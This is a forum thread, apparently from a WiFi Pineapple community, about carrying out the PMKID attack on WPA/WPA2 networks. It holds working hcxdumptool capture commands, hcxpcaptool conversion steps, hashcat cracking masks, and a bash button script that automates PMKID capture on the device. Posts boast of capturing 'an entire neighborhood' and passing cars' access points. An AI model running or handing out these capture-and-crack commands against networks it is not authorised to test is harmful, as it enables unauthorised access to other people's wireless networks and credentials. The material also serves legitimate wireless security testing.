Jump to content

PMKID Attack on WiFi Pineapples

Zylla

By Zylla
in WiFi Pineapple NANO

 Share

Recommended Posts

Just_a_User Newbie

Just_a_User

Posted
Posted
5 minutes ago, Zylla said:

So just a heads up that it might be a while until updates are coming, and the module i had started working on.

Ahhh man that sucks, hopefully you get back on track ASAP. Enjoy the break away from keyboard? ?

Link to comment
Share on other sites
  • Replies 216
  • Created
  • Last Reply

Top Posters In This Topic

Popular Days

Top Posters In This Topic

Popular Days

Popular Posts

Zylla
Zylla

PMKID Attack WPA/WPA2 on WiFi Pineapples! Pineapple NANO + TETRA           WARNING! This attack is EXTREMELY effective on the Pineapples! And is capable of capturing an entire neighborhood

Zylla
Zylla

Thanks! This attack is really something special, compared to a simple de-auth attack. As no clients needs to be connected to the AP for the attack to work. And our small "fits in the pocket" devic

Just_a_User
Just_a_User

This is becoming a treasure trove of ipk's some old ones returning, some updated and  some new!!! MDK4!!! NGREP!!! Pyrit!!! Wireshark!!!! + more!!!  ? ❤️ ❤️ ❤️ This is a real nice addition to t

Posted Images

Zylla Newbie

Zylla

Posted
  • Author
Posted
9 hours ago, Just_a_User said:

Ahhh man that sucks, hopefully you get back on track ASAP. Enjoy the break away from keyboard? ?

Thanks. I'm hoping to get back on track asap. ?

@Sleezybax
That'd be really helpful. I got some components myself that could boost performance, like RAM and SSD-disks laying around.
I'm not looking for a beast-laptop for gaming and such. But still something that's stable and works.
Like, if i was to purchase a new one today in the stores, i'd probably focus on the CPU.
Do you have any details on the "asset" you mentioned? ?
Thanks a lot for attempting to help out ? 

  • Like 1
Link to comment
Share on other sites
Just_a_User Newbie

Just_a_User

Posted
Posted
2 minutes ago, PixL said:

Ok once i've captured a .pcapng file how can I find out what SSIDs it has captured details for?   Or do I have to manually compare BSSIDs? 

When you convert to *.16800 you can cat the file and see each MAC/BSSID but no ESSID.

I started using filters to be more targeted against my test AP's

e.g. 

hcxdumptool -o /root/PMKIDS/local.pcapng -i wlan1mon --enable_status 4 --filterlist /root/targetlist.txt --filtermode 2

This thing is so fast it can pick up car AP;s before they are out of range if your not careful ?

Link to comment
Share on other sites
PixL Newbie

PixL

Posted
Posted

What i'm unsure of is if there is any difference to using:

1.hcxpcaptool -z test.16800 test.pcapng   then using   hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

or

2. hcxpcaptool -o test.hccapx test.pcapng    then using hashcat -m 2500 test.hccapx -a 3 -w 3 '?l?l?l?l?l?lt!'

Link to comment
Share on other sites
Just_a_User Newbie

Just_a_User

Posted
Posted
7 hours ago, PixL said:

What i'm unsure of is if there is any difference to using:

1.hcxpcaptool -z test.16800 test.pcapng   then using   hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

or

2. hcxpcaptool -o test.hccapx test.pcapng    then using hashcat -m 2500 test.hccapx -a 3 -w 3 '?l?l?l?l?l?lt!'

hashcat forum thread says

Quote

There's also support for hash-mode 16801, which allows skipping the computation of the PMK - which is the computation that makes cracking WPA so slow.

 

Link to comment
Share on other sites
Just_a_User Newbie

Just_a_User

Posted
Posted (edited)
1 hour ago, PixL said:

Just_a_User: 

 

Actually this is not what I mean, 16801 means you supply hashcat with pre-hashed PMKs as hex strings.  My above question is about 16800 which is expecting normal text file of passwords.

Oh shoot my bad,  All i found so far is hash-mode 16800 = WPA-PMKID-PBKDF2.

Edited by Just_a_User
Link to comment
Share on other sites
PixL Newbie

PixL

Posted
Posted
22 hours ago, PixL said:

Ok once i've captured a .pcapng file how can I find out what SSIDs it has captured details for?   Or do I have to manually compare BSSIDs?

Ok i've answered my own question, take the converted test.16800 file, open in notepad and then copy the last column from each line (delimited by *) and run it from hex to ascii...... voila you get your SSID.

  • Like 1
Link to comment
Share on other sites
PixL Newbie

PixL

Posted
Posted (edited)
On 8/22/2018 at 10:34 PM, Just_a_User said:

Just a note, new version on tetra is backin action and the filters work a treat ? this thing is so, so fast its amazing really. And perfect for the pineapples button script 

#!/bin/bash
file="/tmp/handshake"
capture="`head -30 /dev/urandom | tr -dc "0123456789" | head -c3`"
if [ -f "$file" ]
then
        killall hcxdumptool
        led YELLOW off
        rm -rf /tmp/handshake
        hcxpcaptool -z test.16800 test.pcapng > test.conlog
        mv test.pcapng /root/$capture.pcapng
        mv test.16800 /root/$capture.16800
        mv test.conlog /root/$capture.conlog
        mv test.log /root/$capture.log

else
        touch /tmp/handshake
        led YELLOW on
        hcxdumptool -o test.pcapng -t 2 -i wlan1mon --enable_status=3 --disable_deauthentications --disable_disassociations > test.log &
fi

1. Click once and it starts capturing PMKID and light yellow LED

2. Click again and it stops capturing, converts the data to 16800 and moves them to /root/random.pcapng and /root/random.16800, turns off yellow LED and dumps a /root/random.log with the hcxdumptool output and random.conlog with the hcxpcaptool output.

Edited by PixL
  • Like 1
Link to comment
Share on other sites
PixL Newbie

PixL

Posted
Posted

Ok so i've made a small script to convert the hex encoded SSID back to text... can anyone improve on this and maybe make something that will take a list of PMKIDs and convert to a list of SSIDs? 

#!/bin/bash
function hex2string () {
  I=0
  while [ $I -lt ${#1} ];
  do
    echo -en "\x"${1:$I:2}
    let "I += 2"
  done
}
read -p 'Hexstring: ' varname
hex2string "$varname"

 

Link to comment
Share on other sites
Zylla Newbie

Zylla

Posted
  • Author
Posted
On 9/2/2018 at 7:05 PM, cheeto said:

Hey guys,

Has anyone actually tried installing this in OS like Kali, Ubuntu?

If so, can you tell me what version of the OS worked for you?   I simply can't get this to work on Kali or Ubuntu. (raspberry pi 3b+ version)

thanks!

 

It was working perfectly on my Kali installation, until my laptop died. 

I have an RPI3B+, and I haven't tested it there myself, it should be working on it according to the developer. (ZerBea) 

Check if you have all dependencies installed before compiling. ?

Link to comment
Share on other sites
g0blin Newbie

g0blin

Posted
Posted

Just reverted back to these versions, and am capturing ok now.

https://github.com/adde88/hcxtools-hcxdumptool-openwrt/raw/b23ae47fa5a9c5d137a0627459cbf0f8a5a1ba4b/bin/ar71xx/packages/base/hcxdumptool_4.2.1-8_ar71xx.ipk
https://github.com/adde88/hcxtools-hcxdumptool-openwrt/raw/cea232511fb6de3b4b71d3b07b8181bb55145a2b/bin/ar71xx/packages/base/hcxtools_4.2.1-9_ar71xx.ipk

Link to comment
Share on other sites
cheeto Newbie

cheeto

Posted
Posted
12 hours ago, Zylla said:

I would also like to notify people (since it's been discussed earlier in the thread) that i was able to cmopile this without any problems on my Raspberry Pi 3b+.
And it's working perfectly. ?

Congrats!!!

You wouldn't happen to have the link to the version of Kali that works on the Raspberry Pi 3b+,

I have Kali on my 3b+ but i think it's a patched up version.

It's my understanding that there is no official version of Kali  for 3b+.  Instead it's a modified version from the RP 3.  Right?

Also, Doesn't PMKID require more GPU?  If that's the case, i would imagine that's it's pretty slow on the the Nano ans the RP3b+.

 

Thanks!!

Link to comment
Share on other sites
Zylla Newbie

Zylla

Posted
  • Author
Posted
5 hours ago, cheeto said:

Congrats!!!

You wouldn't happen to have the link to the version of Kali that works on the Raspberry Pi 3b+,

I have Kali on my 3b+ but i think it's a patched up version.

It's my understanding that there is no official version of Kali  for 3b+.  Instead it's a modified version from the RP 3.  Right?

Also, Doesn't PMKID require more GPU?  If that's the case, i would imagine that's it's pretty slow on the the Nano ans the RP3b+.

 

Thanks!!

Kali is based on Debian, the only "modified versions" I can think of is the images you can download containing the Nexmon patches, making you able to run wlan0 in monitor-mode (and AP mode at the same time) 

But that's just a kernel patch. 

Here's link for a great version: https://re4son-kernel.com/re4son-pi-kernel/

And yeah, same with the Pineapple. You don't use hashcat on these devices to crack the PMKID, you transfer the captures from the device to your desktop which hopefully has a GPU or something ?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...